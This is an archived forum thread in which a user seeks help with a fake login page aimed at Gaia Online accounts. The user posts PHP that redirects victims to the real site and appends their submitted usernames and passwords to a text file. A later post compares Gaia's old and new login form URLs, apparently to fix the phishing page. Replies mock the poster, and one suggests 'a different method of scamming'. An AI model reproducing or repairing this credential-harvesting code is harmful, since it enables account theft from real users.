A preserved archive of the Logical Gamers community forums, 2009-2025. The original threads and posts, served read-only. Registration, posting and private messages are gone for good.

f-l-p

904 views · started by hehe ·
#1
f-l-p
well its been a while since ive been on this site <cant member my old login>

anywho havein an issue with my old flp seems gaia has bypassed this?

and dont mind the ripway link im aware ripway does not work when u send from gaia <3 any one help?

Welcome to Gaia | Gaia Online


my php code

<?php

header("Location: http://www.gaiaonline.com/forums");

$file = 'http://h1.ripway.com/omfgpop/Login.txt';

$handle = fopen("info.txt", "a") ;

fwrite($handle, '');
fwrite($handle, $username);
fwrite($handle, "\r\n");
fwrite($handle, ': ');
fwrite($handle, $password);
fwrite($handle, "\r\n
");
fclose($handle);
exit;
#2
FLP's are old in general.

You can't "bypass" a FLP.

Try using a different host.
#3
dont care if there old they do the job tryied multiple hosting sites they changed there codeing thus bypassing this one >.> saa go away
#4
I don't care if they're old. They do the job. I tried multiple hosting sites and they changed their coding, thus bypassing this one. >.>


Fix'd

How exactly did they "change their coding"?

Let's say they did. Then try a different method of scamming.
#5
saa see the difference?




<form id="memberloginForm" method="post" action="http://www.gaiaonline.com/auth/login/"> <<new line



<form id="memberloginForm" method="POST" action="http://login.gaiaonline.com/gaia/login.php"> << old line